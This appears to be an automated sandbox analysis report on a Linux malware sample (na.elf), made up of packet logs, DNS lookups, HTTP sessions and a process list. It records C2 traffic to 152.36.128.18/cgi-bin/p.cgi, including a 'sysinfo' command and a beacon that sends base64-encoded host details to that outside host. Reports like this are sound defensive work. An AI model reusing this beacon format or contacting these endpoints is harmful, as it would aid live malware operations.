                                                                Apr 1, 2025 01:47:58.825520992 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:58.851362944 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:58.851425886 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:58.926887989 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:58.926939011 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:58.954458952 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:58.954514980 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.033962011 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.034013987 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.060070992 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.060111046 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.138709068 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.138796091 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.164545059 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.164597988 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.242621899 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.242666960 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.266611099 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.266685963 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.347820997 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.347888947 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.368526936 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.368565083 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.454289913 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.454336882 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.467895985 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.498265982 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.498305082 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.560024023 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.601489067 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.601525068 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.601526022 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.629602909 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.629709005 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.703664064 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.703700066 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.703749895 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.734555006 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.734606028 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.734658003 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.805013895 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.805049896 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.805104017 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.840461016 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.840497017 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.840553999 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.905189991 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.905224085 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.905273914 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.943252087 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.943285942 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:47:59.943443060 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:47:59.965727091 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.016971111 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.020241022 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.020292044 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.020508051 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.047302008 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.047333956 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.047581911 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.134785891 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.134836912 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.134838104 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.134887934 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.240050077 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.240113974 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.248348951 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.248404980 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.336847067 CEST42836443192.168.2.2391.189.91.43
                                                                Apr 1, 2025 01:48:00.345740080 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.345807076 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.357964993 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.358006954 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.358052015 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.358052015 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.454422951 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.454497099 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.454552889 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.472214937 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.496823072 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.496881962 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.555454016 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.555501938 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.555573940 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.597949028 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.598007917 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.598064899 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.613595963 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.645104885 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.645143032 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.645157099 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.696782112 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.721041918 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.721077919 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.721167088 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.821727037 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.821863890 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.821916103 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.821917057 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:00.947999001 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:00.948066950 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.036550999 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.036607981 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.036627054 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.036660910 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.104757071 CEST4251680192.168.2.23109.202.202.202
                                                                Apr 1, 2025 01:48:01.131431103 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.131509066 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.143912077 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.208724022 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.228208065 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.228243113 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.228328943 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.316014051 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.316492081 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.316582918 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.342118979 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.342201948 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.346162081 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.377032995 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.436702013 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.446382999 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.446423054 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.446448088 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.446475983 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.540456057 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.540508986 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.540532112 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.541584015 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.555110931 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.555197954 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.577135086 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.652447939 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.652530909 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.754431963 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.754467964 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.754482031 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.754549026 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.847728014 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.847851992 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:01.863759995 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:01.924612045 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.025918007 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.025979042 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.043555021 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.043593884 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.128719091 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.128819942 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.148706913 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.232606888 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.233449936 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.335824013 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.335922003 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.353955984 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.437793016 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.437858105 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.458920956 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.540142059 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.540273905 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.557446003 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.640533924 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.643183947 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.677166939 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.677270889 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.750296116 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.779336929 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.779373884 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.779392958 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.829190016 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.829301119 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:02.889791965 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.889844894 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:02.889913082 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:03.287533045 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:03.287604094 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:03.760211945 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:03.760317087 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:03.768451929 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:03.802891970 CEST5830480192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:03.856200933 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:03.856755972 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:03.897002935 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:03.897080898 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:03.946151018 CEST8058304152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:03.946240902 CEST5830480192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:03.953656912 CEST5830480192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:04.154119015 CEST8058304152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:04.189496994 CEST8058304152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:04.189583063 CEST5830480192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:04.207448959 CEST5830480192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:04.247853994 CEST8058304152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:04.247905970 CEST5830480192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:04.354185104 CEST8058304152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:07.193387032 CEST5830680192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:07.336112976 CEST8058306152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:07.336190939 CEST5830680192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:07.481280088 CEST5830680192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:07.682250977 CEST8058306152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:07.772232056 CEST8058306152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:07.772289038 CEST5830680192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:07.834861994 CEST8058306152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:07.875823021 CEST5830680192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:07.964232922 CEST5830680192.168.2.23152.36.128.18
                                                                Apr 1, 2025 01:48:08.108702898 CEST8058306152.36.128.18192.168.2.23
                                                                Apr 1, 2025 01:48:09.357903004 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:09.357903004 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:09.462831974 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:09.462886095 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:09.463860035 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:09.463920116 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:09.466613054 CEST44355240199.232.90.49192.168.2.23
                                                                Apr 1, 2025 01:48:09.466674089 CEST55240443192.168.2.23199.232.90.49
                                                                Apr 1, 2025 01:48:15.694941044 CEST43928443192.168.2.2391.189.91.42
                                                                Apr 1, 2025 01:48:25.933490038 CEST42836443192.168.2.2391.189.91.43
                                                                Apr 1, 2025 01:48:32.076852083 CEST4251680192.168.2.23109.202.202.202
                                                                Apr 1, 2025 01:48:56.649466991 CEST43928443192.168.2.2391.189.91.42
                                                                Apr 1, 2025 01:49:17.126611948 CEST42836443192.168.2.2391.189.91.43
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 1, 2025 01:50:09.133975029 CEST3961953192.168.2.238.8.8.8
                                                                Apr 1, 2025 01:50:09.247078896 CEST53396198.8.8.8192.168.2.23
                                                                Apr 1, 2025 01:50:09.248434067 CEST4287553192.168.2.238.8.8.8
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Apr 1, 2025 01:50:09.133975029 CEST192.168.2.238.8.8.80x188cStandard query (0)xinchaodbcfda.comA (IP address)IN (0x0001)false
                                                                Apr 1, 2025 01:50:09.248434067 CEST192.168.2.238.8.8.80x188cStandard query (0)xinchaodbcfda.netA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Apr 1, 2025 01:50:09.247078896 CEST8.8.8.8192.168.2.230x188cName error (3)xinchaodbcfda.comnonenoneA (IP address)IN (0x0001)false
                                                                • 152.36.128.18
                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                0192.168.2.2358304152.36.128.1880
                                                                TimestampBytes transferredDirectionData
                                                                Apr 1, 2025 01:48:03.953656912 CEST76OUTGET /cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F HTTP/1.0
                                                                Host: 152.36.128.18
                                                                Apr 1, 2025 01:48:04.189496994 CEST179INHTTP/1.1 200 OK
                                                                Date: Mon, 31 Mar 2025 23:48:04 GMT
                                                                Server: Apache/2.4.41 (Win64)
                                                                Content-Length: 7
                                                                Connection: close
                                                                Content-Type: text/html; charset=windows-1251
                                                                Data Raw: 73 79 73 69 6e 66 6f
                                                                Data Ascii: sysinfo


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                1192.168.2.2358306152.36.128.1880
                                                                TimestampBytes transferredDirectionData
                                                                Apr 1, 2025 01:48:07.481280088 CEST703OUTGET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KICYgYnVsbHNleWUvc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAxODo0ODowNiB1cCA3IG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMS43NiwgMC44MSwgMC4zM3wxNzQzNDY0ODg2DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=TO32433452U81Q0F&h=galassia&enckey=eJjhO0mh02w9T30pl/WXlIUntj41tWS9rSR7xP768bszOdwRRk8sm99Gwb8p4fAUtFsaMrQdz8fJpgNa4ETYXWcBgFPqiTXmoGl+8qZO0fdsuRLffgksPZ8XKYaDpUN8YDBKiLMc17PTEoRT4C+3/J5LJGDBxK7Vu4yhIF//eDI= HTTP/1.0
                                                                Host: 152.36.128.18
                                                                Apr 1, 2025 01:48:07.772232056 CEST224INHTTP/1.1 200 OK
                                                                Date: Mon, 31 Mar 2025 23:48:07 GMT
                                                                Server: Apache/2.4.41 (Win64)
                                                                Content-Length: 3
                                                                Connection: close
                                                                Content-Type: text/html; charset=windows-1251
                                                                Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                                                Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                                                System Behavior

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/cat
                                                                Arguments:cat /tmp/tmp.ROSySM6ZUJ
                                                                File size:43416 bytes
                                                                MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/head
                                                                Arguments:head -n 10
                                                                File size:47480 bytes
                                                                MD5 hash:fd96a67145172477dd57131396fc9608

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/tr
                                                                Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                File size:51544 bytes
                                                                MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/cut
                                                                Arguments:cut -c -80
                                                                File size:47480 bytes
                                                                MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/cat
                                                                Arguments:cat /tmp/tmp.ROSySM6ZUJ
                                                                File size:43416 bytes
                                                                MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/head
                                                                Arguments:head -n 10
                                                                File size:47480 bytes
                                                                MD5 hash:fd96a67145172477dd57131396fc9608

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/tr
                                                                Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                File size:51544 bytes
                                                                MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/cut
                                                                Arguments:cut -c -80
                                                                File size:47480 bytes
                                                                MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:49
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Start time (UTC):23:47:53
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:/tmp/na.elf
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:47:53
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:47:53
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "pgrep na.elf"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:53
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):23:47:53
                                                                Start date (UTC):31/03/2025
                                                                Path:/usr/bin/pgrep
                                                                Arguments:pgrep na.elf
                                                                File size:30968 bytes
                                                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                Start time (UTC):23:47:54
                                                                Start date (UTC):31/03/2025
                                                                Path:/tmp/na.elf
                                                                Arguments:-
                                                                File size:435932 bytes
                                                                MD5 hash:a602ed9fc13cf561bf74b56f8c1aa2ed

                                                                Start time (UTC):23:47:54
                                                                Start date (UTC):31/03/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "pidof na.elf"
                                                                File size:129816 bytes
